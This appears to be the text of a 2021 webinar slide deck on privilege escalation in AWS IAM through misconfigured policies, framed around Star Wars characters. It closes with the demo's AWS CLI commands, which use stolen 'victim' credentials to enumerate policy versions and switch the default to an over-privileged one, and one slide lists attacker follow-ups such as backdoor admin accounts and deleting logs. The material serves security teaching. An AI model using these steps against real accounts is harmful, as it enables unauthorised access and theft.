Upgrade to Pro — share decks privately, control downloads, hide ads and more …

IAM Bad: Privilege Escalation using Misconfigured Policies in AWS IAM (Webinar)

IAM Bad: Privilege Escalation using Misconfigured Policies in AWS IAM (Webinar)

Slides from a webinar conducted on Star Wars Day, 2021.

The webinar was focused on a demo of a mis-configured AWS IAM policy that allows a user to gain administrative privileges within AWS.


May 06, 2021

More Decks by KloudleInc

Other Decks in Technology


  1. IAM Bad Privilege Escalation using Misconfigured Policies in AWS IAM

    Riyaz Walikar | Co-Founder - Kloudle | [email protected] May the 4th 2021 – 8:00 AM PDT (8:30 PM IST)
  2. Riyaz Walikar Co-founder & Chief Breaker of Things @ Kloudle

    Inc. Twitter: @riyazwalikar, Blog: https://ibreak.software • Over a decade of experience in breaking web & mobile apps, networks, wireless, cloud and most recently container and Kubernetes • Have led Product Security and Consulting teams at Citrix and PwC SDC in a past life and was the OffSec Lead at Appsecco before moving on to co-founding Kloudle • Have multiple certifications as a result of my learning curve over the years, including CKA, CKAD, OSCP, CREST etc. (also, because they look cool on LinkedIn ☺) • Speaker at multiple cons, co-author, trainer, security evangelist with a short attention span and attracted to all things shiny
  3. What is the webinar about? • What is an AWS

    IAM policy? • Common examples of a misconfigured or overly permissive policy • Demo of a misconfiguration within a policy that leads to privilege escalation. • Q&A
  4. What is an AWS IAM Policy • A policy is

    an object in AWS that, when associated with an identity or resource, defines their permissions. • AWS evaluates these policies when an IAM principal (user or role) makes a request. • Permissions in the policies determine whether the request is allowed or denied.
  5. Demo Assumptions and Goal • Because we are demonstrating privilege

    escalation, we work with the assumption that we have gained access to General Tarkin’s AWS credentials • These credentials appear to be non-privileged. • Our aim is to exploit a mis-configuration with the user’s policy definition and gain access to the employee database for the Death Star
  6. Post privilege escalation? • With the kind of access you

    will get, explore what else is available within the AWS account • Attackers tend to focus on data theft/destruction and make an attempt to use resources for their own benefit (like crypto-mining) etc. • Some attackers create a shadow admin account and use this as a backdoor • To hide their traces within AWS, attacker may also remove AWS logs (CloudTrail, flowlogs etc.).
  7. Commands from the Demo aws rds describe-db-instances --profile <victim-profile-name> aws

    sts get-caller-identity --profile <victim-profile-name> aws iam list-attached-user-policies --user-name <victim-aws-user-name> --profile <victim-profile-name> aws iam get-policy --policy-arn "<arn-value-of-policy>" --profile <victim-profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v6 --profile <victim- profile-name> aws iam list-policy-versions --policy-arn "<arn-value-of-policy>" --profile <victim-profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v1 --profile <victim- profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v2 --profile <victim- profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v4 --profile <victim- profile-name> aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v5 --profile <victim- profile-name> aws iam set-default-policy-version --policy-arn "<arn-value-of-policy>" --version-id <version-with- excessive-privs> --profile <victim-profile-name> aws rds describe-db-instances --profile <victim-profile-name>